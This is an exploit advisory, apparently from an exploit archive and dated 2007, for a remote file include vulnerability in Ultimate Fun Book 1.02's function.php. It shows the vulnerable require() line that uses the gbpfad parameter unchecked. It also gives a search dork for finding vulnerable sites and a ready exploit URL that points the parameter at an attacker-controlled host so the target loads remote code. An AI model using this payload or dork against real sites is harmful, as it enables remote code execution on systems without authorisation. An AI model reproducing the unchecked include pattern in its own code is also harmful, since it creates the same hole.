Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability
# Published : 2007-02-20
# Author : kezzap66345
# Previous Title : NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit
# Next Title : NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit

****Ultimate Fun Book 1.02****
**found by:kezzap66345
**contant= [:(]
**download script=http://www.ultimate-fun-board.de
**dork:Ultimate-Fun-Book 1.02

file:

function.php

code:

<?php
require($gbpfad."/config.php");

exploit:

http://target/path/function.php?gbpfad=http://evil[script]

*********thanx= x0r0n,str0ke,shakia***********
*****************************************

# www.Syue.com [2007-02-20]